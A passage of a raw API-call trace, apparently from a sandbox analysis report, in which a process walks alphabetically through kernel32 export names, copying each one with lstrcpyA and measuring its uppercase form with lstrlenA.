returned="ConvertCalDateTimeToSystemTime" [0185.541] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.541] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.541] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.541] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.541] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.541] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.541] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.541] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.541] lstrlenA (lpString="COPYFILEA") returned 9 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.541] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.541] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.541] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.541] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.541] lstrlenA (lpString="COPYFILEW") returned 9 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.542] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.542] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.542] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.542] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.542] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.542] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.542] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.542] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.542] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.542] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.542] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.542] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.542] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.542] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.542] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.542] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.542] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.542] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.542] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.543] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.543] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.543] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.543] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.543] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.543] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.543] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.543] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.543] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.543] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.543] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.543] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.543] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.543] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.543] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.543] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.543] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.543] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.543] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.544] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.544] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.544] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.544] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.544] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.544] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.544] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.544] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.544] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.544] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.544] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.544] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.544] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.544] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.544] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.544] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.544] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.544] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.544] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.544] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.545] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.545] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.545] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.545] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.545] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.545] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.545] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.545] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.545] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.545] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.545] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.545] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.545] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.545] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.545] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.545] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.545] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.545] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.545] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.546] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.546] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.546] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.546] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.546] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.546] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.546] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.546] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.546] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.546] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.546] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.546] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.546] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.546] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.546] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.546] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.546] lstrlenA (lpString="DELETEATOM") returned 10 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.546] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.546] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.546] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.547] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.547] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.547] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.547] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.547] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.547] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.547] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.547] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.547] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.547] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.547] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.547] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.547] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.547] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.547] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.547] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.547] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.547] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.547] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.547] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.548] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.548] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.548] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" 